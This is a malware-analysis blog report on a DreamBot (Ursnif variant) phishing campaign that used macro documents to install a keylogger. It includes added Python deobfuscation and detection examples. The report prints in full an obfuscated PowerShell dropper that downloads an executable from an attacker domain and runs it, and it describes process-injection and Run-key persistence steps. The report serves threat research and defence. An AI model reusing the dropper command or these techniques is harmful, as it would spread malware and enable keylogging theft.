DreamBot Campaign Dreams Big

May 31, 2018 | Luis Mendieta


Beginning in late April, Anomali Labs observed a phishing campaign distributing malicious documents containing macros to download DreamBot, a variant of Ursnif. The downloaded DreamBot payload turned out to be a stealthy keylogger, contrary to previously observed behavior from this malware family. The campaign, which lasted several weeks, continually rotated its distribution architecture by using a variety of domains and IPs. At the time of this writing, the campaign is still active.

Distribution Analysis

Anomali Labs was able to track this campaign by analyzing and observing the document lure and payload syntax. For the purpose of this report, the EWS_Inquiry.doc dropper (MD5 b20263ba3773b91bdd947af429e289af) was analyzed. The document lure is a mock Office365 message enticing the user to “Enable Editing”, then “Enable Content” to view the document.

Figure 1 Malicious Document Lure

Malicious macros are a popular choice for attackers because they are relatively easy to create and require limited user interaction. The EWS_Inquiry.doc contains multiple heavily obfuscated macros with random names. Upon execution, the macro uses PowerShell to initiate an HTTP GET request to http://kkjkajsdjasdqwec.com/ARN/testv.php?l=ttner4.yarn.

powershell " ('V'+'SDns'+'adasd ='+' &(8n'+'7'+'n8n7'+'+8n7e'+'8n'+'7+8n'+'7w-o'+'bje'+'c8n7+8n7t8n7'+') ra'+'nd'+'om;VSDYYU '+'='+' .(8n7ne'+'8n7+8n'+'7w8n7+8n7-ob'+'ject8n7) Syste'+'m.N'+'et.W'+'eb'+'Clie'+'nt;'+'VSD'+'NS'+'B'+' '+'='+' '+'VSDns'+'a'+'dasd.'+'next(1'+'0000'+', 2821'+'33);VS'+'D'+'A'+'D'+'CX = 8n7 http://kkjk'+'ajsd'+'ja'+'s'+'dqwe'+'c.com/A'+'RN/tes'+'tv'+'.ph'+'p?l'+'=ttner'+'4.yarn8'+'n7.Split(8n'+'7@8n7'+');VSD'+'SDC = VSDe'+'nv:'+'p'+'u'+'blic + 8n7wZU8'+'n7 + VSDN'+'SB +'+' (8n7.ex'+'8n'+'7+8n7e8n7);f'+'or'+'ea'+'c'+'h'+'(V'+'SD'+'asf'+'c '+'in VS'+'DAD'+'CX){'+'tr'+'y{VSD'+'YYU.xPr'+'D'+'oKcVW'+'nl'+'KcVOa'+'dF'+'IKcVl'+'exPr(V'+'S'+'D'+'asfc.xPrToStrK'+'cViKc'+'VNg'+'xPr(), VS'+'DS'+'DC'+')'+';&(8n'+'7Invo8n7+8n7k8'+'n7+8n7'+'e-Item8n7'+')'+'(VS'+'D'+'SDC'+');'+'b'+'r'+'eak;}c'+'a'+'tc'+'h{}'+'}').RePlacE(([CHAr]75+[CHAr]99+[CHAr]86),'`').RePlacE(([CHAr]56+[CHAr]110+[CHAr]55),[strInG][CHAr]39).RePlacE('wZU','\').RePlacE(([CHAr]120+[CHAr]80+[CHAr]114),[strInG][CHAr]34).RePlacE(([CHAr]86+[CHAr]83+[CHAr]68),'$') |& ((vARiaBLe '*mdr*').NAmE[3,11,2]-JoIN'')

Figure 2 PowerShell Command to Download Payload

The resulting payload is downloaded to C:\Users\Public\{number}.exe and executed.
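
The concatenation and .RePlacE() layers shown in Figure 2 can be undone statically, without running PowerShell. The following Python is an added example, not part of the original report; the function names are hypothetical and the input is a shortened excerpt of the Figure 2 command that is only parsed as text.

```python
import re

# Constructed sample: a shortened excerpt of the Figure 2 command with the
# same five .RePlacE() stages. It is parsed as text and never executed.
SAMPLE = (
    "('VSD'+'A'+'D'+'CX = 8n7 http://kkjk'+'ajsd'+'ja'+'s'+'dqwe'+'c.com/A'"
    "+'RN/tes'+'tv'+'.ph'+'p?l'+'=ttner'+'4.yarn8'+'n7.Split(8n'+'7@8n7'+');"
    "VSD'+'SDC = VSDe'+'nv:'+'p'+'u'+'blic + 8n7wZU8'+'n7 + VSDN'+'SB +'"
    "+' (8n7.ex'+'8n'+'7+8n7e8n7);')"
    ".RePlacE(([CHAr]75+[CHAr]99+[CHAr]86),'`')"
    ".RePlacE(([CHAr]56+[CHAr]110+[CHAr]55),[strInG][CHAr]39)"
    ".RePlacE('wZU','\\')"
    ".RePlacE(([CHAr]120+[CHAr]80+[CHAr]114),[strInG][CHAr]34)"
    ".RePlacE(([CHAr]86+[CHAr]83+[CHAr]68),'$')"
)

# One .Replace(old,new) stage; stops at the next stage, a pipe, or end of text.
REPLACE_RE = re.compile(
    r"\.replace\((.*?),(.*?)\)(?=\.replace\(|\s*\||\s*$)", re.I)

def decode_arg(arg):
    """Decode a Replace() argument: a [char]N+[char]N sum or a quoted literal."""
    codes = re.findall(r"\[char\](\d+)", arg, re.I)
    if codes:
        return "".join(chr(int(c)) for c in codes)
    return arg.strip().strip("()")[1:-1]

def deobfuscate(cmd):
    """Join the 'a'+'b' literals, then apply each Replace() stage in order."""
    stages = list(REPLACE_RE.finditer(cmd))
    body = cmd[:stages[0].start()] if stages else cmd
    script = "".join(re.findall(r"'([^']*)'", body))
    for m in stages:
        # String.Replace in .NET is case-sensitive, as is str.replace here.
        script = script.replace(decode_arg(m.group(1)), decode_arg(m.group(2)))
    return script

def extract_urls(script):
    """Pull download URLs out of the recovered script text."""
    return re.findall(r"https?://[^\s'\"]+", script)

if __name__ == "__main__":
    recovered = deobfuscate(SAMPLE)
    print(recovered)
    print(extract_urls(recovered))
```

The recovered text exposes both the download URL and the $env:public drop path, which is where the C:\Users\Public\{number}.exe location comes from.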

Technical Analysis

Host Indicators

The DreamBot implant we observed has close similarities to the variants reported by Proofpoint analysts (see footnote 1). Perhaps the most interesting characteristic of this variant is its flow of execution. First, the PowerShell script executes the downloaded payload, which spawns a child process. Next, the child process executes the legitimate Windows utility “control.exe”. The implant payload injects code into the “control.exe” process space, and then creates a series of registry keys that are consistent with DreamBot. Figure 3 below shows the created keys:

Figure 3 Registry keys created by Control.exe

The registry keys seen in Figure 3 are located at the following path:

HKCU\SOFTWARE\AppDataLow\Software\Microsoft\{Random id number}

During the next step of the execution chain, control.exe injects code into the explorer.exe process space. When the injected code starts running in explorer.exe, it installs a persistence mechanism in the HKCU\...\CurrentVersion\Run registry key. See the registry key path below:

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\adprfest  = [path of payload]

The memory space of the explorer.exe process contained several domains related to the compromise. We also observed full URLs used for C2 communications, as can be seen in the figure below:

Figure 4 Explorer.exe memory strings
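
The execution chain and registry writes described in this section can be checked by correlating process-creation and registry telemetry. The following Python is an added example, not Anomali's tooling; the event schema, PIDs, function names and sample events are constructed for illustration.

```python
import re

PAYLOAD_RE = re.compile(r"^C:\\Users\\Public\\\d+\.exe$", re.I)
APPDATALOW = "hkcu\\software\\appdatalow\\software\\microsoft\\"
RUN_KEY = "hkcu\\software\\microsoft\\windows\\currentversion\\run\\"

# Constructed events in a simplified, hypothetical schema (not real telemetry).
EVENTS = [
    {"type": "proc", "pid": 100, "ppid": 50, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"type": "proc", "pid": 200, "ppid": 100, "image": r"C:\Users\Public\123456.exe"},
    {"type": "proc", "pid": 300, "ppid": 200, "image": r"C:\Users\Public\123456.exe"},
    {"type": "proc", "pid": 400, "ppid": 300, "image": r"C:\Windows\System32\control.exe"},
    {"type": "proc", "pid": 900, "ppid": 1, "image": r"C:\Windows\explorer.exe"},
    {"type": "proc", "pid": 950, "ppid": 900, "image": r"C:\Windows\System32\control.exe"},  # benign
    {"type": "reg", "pid": 400, "key": r"HKCU\SOFTWARE\AppDataLow\Software\Microsoft\{constructed-id}"},
    {"type": "reg", "pid": 900, "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\adprfest"},
    {"type": "reg", "pid": 950, "key": r"HKCU\Control Panel\Desktop\Wallpaper"},  # benign
]

def ancestors(pid, procs):
    """Yield parent process records, nearest first; stops on unknown PID or loop."""
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        pid = procs[pid]["ppid"]
        if pid in procs:
            yield procs[pid]

def findings(events):
    """Return (rule, pid) pairs for the three behaviours the report describes."""
    procs = {e["pid"]: e for e in events if e["type"] == "proc"}
    out = []
    for e in events:
        if e["type"] == "proc" and e["image"].lower().endswith("\\control.exe"):
            chain = [a["image"].lower() for a in ancestors(e["pid"], procs)]
            drop = next((i for i, img in enumerate(chain) if PAYLOAD_RE.match(img)), None)
            # The dropped payload must itself descend from powershell.exe.
            if drop is not None and any(p.endswith("\\powershell.exe") for p in chain[drop:]):
                out.append(("chain", e["pid"]))
        elif e["type"] == "reg":
            key = e["key"].lower()
            writer = procs.get(e["pid"], {}).get("image", "").lower()
            if key.startswith(APPDATALOW) and writer.endswith("\\control.exe"):
                out.append(("appdatalow", e["pid"]))
            elif key.startswith(RUN_KEY) and writer.endswith("\\explorer.exe"):
                out.append(("run", e["pid"]))
    return out
```

On the constructed events, only the control.exe instance descended from the dropped payload and the two registry writes are reported; control.exe launched from explorer.exe is not.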

Network Communications

This variant of DreamBot communicates over HTTPS. Anomali Labs intercepted the SSL traffic to uncover the transmitted data. Analysis of the HTTPS request revealed the transfer of small Windows .cab files with the following naming convention: [A-Z0-9]{4}.bin. Figure 5 below shows the decrypted HTTPS request:

Figure 5 Decrypted HTTPS request

We analyzed the exfiltrated .cab files and discovered they were actually keylog files. Figure 6 below demonstrates the content of one of these files:

Figure 6 Keylog Data


Anomali Labs’ research of this DreamBot campaign identified significant developments in recent DreamBot deployment.

  • The use of process injection twice is unique and complicates analysis: identifying the breakpoint in the newly injected processes, which run outside of the current debugger, is difficult and requires monitoring Windows API calls outside of standard process debugging.
  • The use of DreamBot as a keylogger differs from DreamBot’s previous usage as a banking trojan. This could indicate attackers are broadening the scope of targeting for this campaign beyond banking credentials.

Anomali Labs will continue to track this campaign and provide our clients with updated IOCs and reporting.

Indicators of Compromise

DreamBot Delivery


DreamBot Command and Control

1. https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality

About the Author

Luis Mendieta

Luis Mendieta is a senior security researcher who enjoys poking inside malware and building automated systems to process threat data. He has 5 years in the security industry, focusing on intelligence and research. Currently at Anomali, Luis researches the latest malware families and builds tools that allow for faster analysis and processing. Previously, he worked as a senior threat analyst at Verizon, supporting cyber security incident response engagements with cyber intelligence capabilities. Prior to Verizon, he worked at Terremark as a SOC analyst 2, then moved up the ranks to become an investigations analyst. Luis enjoys playing scenario paintball, running and the outdoors.
